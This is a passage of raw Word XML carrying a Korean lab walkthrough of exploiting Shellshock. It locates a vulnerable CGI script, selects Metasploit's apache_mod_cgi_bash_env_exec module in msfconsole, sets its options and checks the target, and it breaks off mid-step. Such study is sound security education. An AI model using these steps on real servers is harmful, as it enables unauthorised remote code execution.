          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidR="006C5A52">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>익스플로잇을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 활용하여 진행해보도록 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B65A5D5" w14:textId="70982179" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="006C5A52">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A52">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>먼저,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A52">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A52">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">취약점 존재여부만 알고 선행과정이 없었다는 전제 하 </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A52">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">CGI </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A52">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>스크립트 경로를 확인해야 한다.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A52">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9D7D88" w14:textId="4048F803" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="006C5A52">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>개발자 도구 F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>를 통해 다음의 경로에서 확인할 수 있다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> Body -&gt; main -&gt; &lt;p&gt; &lt;p&gt; -&gt; &lt;iframe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5F4FE0" w14:textId="26E3DE1D" w:rsidR="006C5A52" w:rsidRPr="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="006C5A52">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">이를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">통해 취약점이 있는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">CGI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">스크립트의 경로는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">gi-bin/shellshock.sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>임을 확인했다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F8325B" w14:textId="6A291C50" w:rsidR="006C5A52" w:rsidRPr="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="006C5A52">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:noProof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25EDFB" wp14:editId="40C76CC2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>216943</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2846098</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5344520" cy="240258"/>
                <wp:effectExtent l="19050" t="19050" r="27940" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="42" name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520" cy="2402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59FBD" id="직사각형 42" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:17.1pt;margin-top:224.1pt;width:420.85pt;height:18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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59D7404A" wp14:editId="3DA42C96">
            <wp:extent cx="5799942" cy="4026089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747" cy="403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6676A" w14:textId="4DBF4391" w:rsidR="006C5A52" w:rsidRPr="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F768D3" w14:textId="243EB7FA" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>2) kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A52">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>먼저</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">을 위하여 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>에 진입한다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>그 후 활용할 M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>odule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>을 검색한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ED3382" w14:textId="59418E28" w:rsidR="00664756" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76679FC3" wp14:editId="5E4F55B9">
            <wp:extent cx="5800298" cy="1733408"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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161" cy="174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B764C" w14:textId="77777777" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A52">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>exploit/multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C5A52">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>apache_mod_cgi_bash_env_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C5A52">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>을</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 사용하기로 한다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BB1904" w14:textId="5508CD7D" w:rsidR="00664756" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>3) exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>을 위하여 적용해야 할 옵션을 검색한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FFDD02" w14:textId="0857CDB9" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="444F7E51" wp14:editId="2498953E">
            <wp:extent cx="5868537" cy="442214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528" cy="442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A75B5" w14:textId="209A7385" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>equired</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">에 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>로 된 속성 중,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>공백이 된 속성들을 채워야 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C21263F" w14:textId="48A78FBF" w:rsidR="006C5A52" w:rsidRPr="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>아까 확인했던 스크립트 경로를 포함하여 속성들을 설정한다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> Check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>는 해당 취약점이 적용 가능한지 미리 확인해보는 명령어로,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>한 상태인 것을 미리 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3B6817" w14:textId="072EB078" w:rsidR="00664756" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C23CE3" wp14:editId="0CA228BE">
            <wp:extent cx="5977719" cy="2320148"/>
            <wp:effectExtent l="0" t="0" r="4445" b="444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045" cy="233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FA388" w14:textId="215CE3DA" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
